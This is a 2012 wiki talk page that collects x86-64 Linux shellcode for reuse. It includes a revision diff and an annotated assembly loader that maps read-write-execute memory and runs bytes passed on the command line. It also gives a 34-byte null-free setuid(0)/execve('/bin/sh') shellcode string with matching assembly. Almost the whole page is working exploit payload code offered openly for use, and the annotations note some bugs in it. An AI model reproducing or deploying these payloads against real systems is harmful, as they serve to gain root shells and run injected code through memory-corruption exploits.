
Difference between revisions of "Category talk:Shellcode"

Line 23: Line 23:
  
 
_start:
 
_start:
 +
pop %rbx  # argc
 +
pop %rbx  # arg0
 +
pop %rbx  # arg1 pointer
  
pop %rbx  # argc
 
pop %rbx  # arg0
 
pop %rbx  # arg1 pointer
 
  
 +
push $0x9
 +
pop %rax
  
push $0x9
+
xor %rdi, %rdi
pop %rax
+
push %rdi
 +
pop %rsi
 +
inc %rsi
 +
shl $0x12, %rsi
  
xor %rdi, %rdi
+
push $0x7
push %rdi
+
pop %rdx
pop %rsi
+
push $0x22
inc %rsi
+
pop %r10
shl $0x12, %rsi
+
# mov $0x1000, %rsi
+
push $0x7
+
pop %rdx
+
push $0x22
+
pop %r10
+
  
push %rdi
+
push %rdi
push %rdi
+
push %rdi
pop %r8
+
pop %r8
pop %r9
+
pop %r9
  
syscall  # The syscall for the mmap().
+
syscall  # The syscall for the mmap().
  
xor %rsi, %rsi
+
begin_inject:
push %rsi
+
xor %rsi, %rsi
pop %rdi     
+
push %rsi
 +
pop %rdi     
  
 
inject_loop:
 
inject_loop:
    cmp %rdi, (%rbx, %rsi, 1)
+
cmp %rdi, (%rbx, %rsi, 1)
    je inject_finished
+
je inject_finished
    mov (%rbx, %rsi, 1), %r10
+
mov (%rbx, %rsi, 1), %r10
    mov %r10, (%rax,%rsi,1)
+
mov %r10, (%rax,%rsi,1)
    inc %rsi
+
inc %rsi
    jmp inject_loop
+
jmp inject_loop
  
 
inject_finished:
 
inject_finished:
    call *%rax
+
call *%rax
  
 
exit:
 
exit:
    push $60
+
push $60
    pop %rax
+
pop %rax
    xor %rdi, %rdi
+
xor %rdi, %rdi
    syscall
+
syscall
 
+
 
</source>}}
 
</source>}}
  

Revision as of 21:40, 1 September 2012

Hey guys, thought we could use some collections of this stuff for re-use purposes. Let's only contribute things we wrote ourselves; no copy-pasting others' code, please! Hatter 05:23, 19 August 2012 (MSK)

Collections

c3el4.png This page needs shellcode and will be updated with it shortly.

Thanks for your patience.

Windows

Linux

64-bit

Shellcode loader

You shouldn't need to use this algorithm as a buffer-overflow payload, but it's null-free just in case. For 64-bit Linux kernel 3 systems.

Usage:

  as inject.s -o inject.o ; ld inject.o -o inject
  ./inject "$(echo -en "\x90\x90\x90")"   
  • The above example will execute three no-ops (the \x90 bytes above).
 
# Shellcode loader: x86-64 Linux, GAS/AT&T syntax, raw syscalls only (no libc).
# Copies the bytes of argv[1] into a freshly mmap()ed anonymous region and
# calls them, then exits with status 0.
#
# Register roles:
#   rbx = argv[1] (source bytes)         rax = mmap() result (destination and call target)
#   rsi = copy index                     rdi = 0, the value the terminator check compares against
#
# Review notes (left as-is, because the exact byte encoding is the artifact here):
#   * mmap()'s return value is never checked. On failure the kernel leaves -errno in
#     %rax, and `call *%rax` below would then jump to that small negative value and fault.
#   * `cmp %rdi, (%rbx,%rsi,1)` is a 64-bit compare, so the loop stops only at a run
#     of eight consecutive zero bytes, not at argv[1]'s single terminating NUL; the copy
#     keeps reading (and copying) past the end of the argument until such a run appears.
#   * The region is requested as PROT_READ|PROT_WRITE|PROT_EXEC (rdx = 7), i.e. an
#     anonymous RWX mapping, which is exactly the condition a W^X policy or an
#     RWX-mmap detection rule looks for.
.section .data
.section .text
.globl _start
 
_start:
 pop %rbx  # argc
 pop %rbx  # arg0
 pop %rbx  # arg1 pointer  -> rbx = argv[1], the bytes to run
 
 
 push $0x9
 pop %rax                   # rax = 9 = SYS_mmap (push/pop instead of mov imm32 keeps the encoding null-free)
 
 xor %rdi, %rdi             # addr = NULL (kernel chooses the address)
 push %rdi
 pop %rsi
 inc %rsi
 shl $0x12, %rsi            # length = 1 << 0x12 = 0x40000 bytes
 
 push $0x7
 pop %rdx                   # prot = 7 = PROT_READ|PROT_WRITE|PROT_EXEC
 push $0x22
 pop %r10                   # flags = 0x22 = MAP_PRIVATE|MAP_ANONYMOUS (4th syscall arg goes in r10, not rcx)
 
 push %rdi
 push %rdi
 pop %r8                    # fd = 0 (ignored for an anonymous mapping)
 pop %r9                    # offset = 0
 
 syscall   # The syscall for the mmap().  rax = mapped address, or -errno on failure (not checked)
 
begin_inject:
 xor %rsi, %rsi             # rsi = 0, byte index into source and destination
 push %rsi
 pop %rdi                   # rdi = 0, compared against the source below as the terminator
 
inject_loop:
 cmp %rdi, (%rbx, %rsi, 1)  # 64-bit compare: stops only on eight consecutive zero bytes (see note above)
 je inject_finished
 mov (%rbx, %rsi, 1), %r10  # 8-byte load, but the index advances by 1, so successive stores overlap
 mov %r10, (%rax,%rsi,1)
 inc %rsi
 jmp inject_loop
 
inject_finished:
 call *%rax                 # run the copied bytes; control returns here only if they end in a `ret`
 
exit:
 push $60
 pop %rax                   # rax = 60 = SYS_exit
 xor %rdi, %rdi             # status = 0
 syscall
 


setuid(0); execve('/bin/sh'); - 34 bytes

Hatter 05:27, 19 August 2012 (MSK)

  • \x48\x31\xff\x6a\x69\x58\x0f\x05\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05
 
# setuid(0) followed by execve("/bin/sh", NULL, NULL); x86-64 Linux, GAS/AT&T syntax.
# Note: the 34-byte string listed above is a null-free variant (it begins with
# `xor %rdi,%rdi` = 48 31 ff and `push $105; pop %rax` = 6a 69 58), not a
# byte-for-byte assembly of this listing, whose `mov $0, %rdi` / `mov $105, %rax`
# forms encode with zero bytes.
.section .data
.section .text
.globl _start
_start:
 mov $0, %rdi     # uid = 0
 mov $105, %rax   # rax = 105 = SYS_setuid
 syscall          # return value not checked; execve below runs regardless
 
# Syscall arguments are passed in %rdi, %rsi, %rdx (SysV AMD64 / Linux syscall ABI), in that order.
 mov $59, %rax    # rax = 59 = SYS_execve
                 # execve(filename, argv, envp)
 push $0x00       # one zero qword on the stack, pointed to by both argv and envp below
 mov %rsp, %rdx # argv is null  (note: %rdx is actually the 3rd argument, envp; harmless here because argv and envp are the same NULL pointer)
 mov %rsp, %rsi # envp is null  (and %rsi is the 2nd argument, argv)
 mov $0x0068732f6e69622f, %rcx   # "/bin/sh\0" as a little-endian qword
 push %rcx
 mov %rsp, %rdi # filename is '/bin/sh\0'
 syscall
 
 mov $60, %rax    # reached only if execve fails: exit(0)
 mov $0, %rdi
 syscall